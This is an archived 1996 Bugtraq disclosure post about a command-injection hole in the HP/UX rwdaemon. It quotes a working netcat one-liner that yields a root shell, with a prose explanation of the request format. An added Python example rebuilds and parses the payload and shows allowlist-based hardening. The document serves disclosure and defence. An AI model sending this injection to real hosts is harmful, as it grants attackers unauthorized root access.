Bugtraq mailing list archives
HP/UX Remote Watch (was Re: BoS: SOD remote exploit)
From: barnett () GRYMOIRE CRD GE COM (Bruce Barnett)
Date: Tue, 15 Oct 1996 09:51:10 -0400
There have been questions about this exploit:

==========
#!/bin/ksh
# $1 is the target host; rwdaemon normally listens on TCP port 5556
echo ' 11T ;/bin/ksh' | nc $1 5556
# Yup, that's it. That's the hole.. Believe it.
==========

This was the first HP "hole of the week", found "courtesy of" http://command.com.inter.net/~sod in late September 1996. I found the following note along with the exploit:

==========
The Explanation

First, if you're not running with netcat, stop and go out and get it. You could do this with telnet, and netcat certainly isn't required for this at all, but it just kicks in general, IMHO.

Now, basically what we're doing is sending a string to the rwdaemon port, which is usually # 5556. This could change, but I haven't seen anyone who's done it yet.

The string has basically three parts, the ' 11' part, the T, and the ';/bin/ksh' part. The 11 represents the total string length as sent to the daemon (minus the first three bytes, of course), sent in ASCII numeric for some ungodly reason. The T signals a certain program, in this case, ummm, getparams, I think. Now from this point, we can only send a single argument to the daemon, because it will strip out whitespace-separated arguments and only use the first one.

The getparams program gets run under a shell, so all the shell metacharacters are valid. The shell gets sent the command 'getparams -somearg1 -somearg2 ;/bin/ksh -v' (the -v gets stuck as the last argument). It'll balk on the getparams, send the error, then drop you into a root shell.. How thoughtful of it.
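The request framing that the SOD note describes, worked through as an added example; this is not code from the original post, from SOD or from HP. It assumes the three-byte length field is right-justified and space-padded (inferred only from the sample ' 11T ;/bin/ksh'), leaves out the fixed getparams options the note names only as -somearg1/-somearg2, and models the daemon's shell call as 'getparams <argument> -v' from the note's wording. The allowlist and argv-based handling at the end are this example's own hardening, not HP's fix. Nothing here opens a socket; it only builds, parses and inspects the request so the injection point is visible.

```python
from __future__ import annotations

import re
import shlex

# Wire format of an rwdaemon request, as described in the SOD note:
#   bytes 0-2  ASCII decimal length of everything that follows
#   byte  3    one-character program selector ('T' is said to be getparams)
#   bytes 4-   one argument; anything after the first whitespace-separated
#              word is discarded by the daemon
# Assumption: the length field is right-justified and space-padded. That is
# inferred from the sample ' 11T ;/bin/ksh' in the post, not from HP docs.


def frame(selector: str, argument: str) -> bytes:
    """Build a request with a correctly computed length prefix."""
    if len(selector) != 1:
        raise ValueError("program selector must be exactly one byte")
    body = selector + argument
    if len(body) > 999:
        raise ValueError("body does not fit in a three-digit length field")
    return f"{len(body):3d}{body}".encode("ascii")


def parse(msg: bytes) -> tuple[str, str]:
    """Decode a request the way the note says the daemon does: check the
    declared length, take the selector byte, and keep only the first
    whitespace-separated word of the remainder as the argument."""
    if len(msg) < 4:
        raise ValueError("request too short")
    declared = int(msg[:3].decode("ascii"))
    body = msg[3:].decode("ascii")
    if declared != len(body):
        raise ValueError(f"declared length {declared} != actual {len(body)}")
    words = body[1:].split()
    return body[0], (words[0] if words else "")


def unsafe_command_line(argument: str) -> str:
    """Model of the vulnerable daemon: the argument is spliced into a string
    handed to a shell, with '-v' appended last. The fixed getparams options
    the note only placeholders as -somearg1/-somearg2 are omitted here."""
    return f"getparams {argument} -v"


def shell_commands(line: str) -> list[list[str]]:
    """Tokenise a line as a POSIX shell would and split it at ';' so an
    injected second command shows up as its own argv."""
    lexer = shlex.shlex(line, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    commands: list[list[str]] = []
    current: list[str] = []
    for token in lexer:
        if token == ";":
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


# Hardened handling (this example's own, not HP's fix): validate the argument
# against an allowlist and build an argv list for exec without any shell.
ALLOWED_ARGUMENT = re.compile(r"[A-Za-z0-9._-]+")


def is_safe_argument(argument: str) -> bool:
    """True only for arguments made of allowlisted characters."""
    return ALLOWED_ARGUMENT.fullmatch(argument) is not None


def safe_argv(argument: str) -> list[str]:
    """Return the argv to hand to subprocess.run(argv) with no shell=True."""
    if not is_safe_argument(argument):
        raise ValueError("argument contains characters outside the allowlist")
    return ["getparams", argument, "-v"]


if __name__ == "__main__":
    exploit = frame("T", " ;/bin/ksh")  # rebuilds the posted string
    print(exploit)
    selector, argument = parse(exploit)
    print(selector, repr(argument))
    print(shell_commands(unsafe_command_line(argument)))
    print(is_safe_argument(argument), safe_argv("hostname"))
```

Running the file rebuilds the posted request from its parts, parses it back, and shows that the single argument the daemon keeps (';/bin/ksh') turns the modelled command line into two shell commands, the second of which is '/bin/ksh -v'. The same argument fails the allowlist, while an ordinary word passes and is returned as a plain argv list that never reaches a shell.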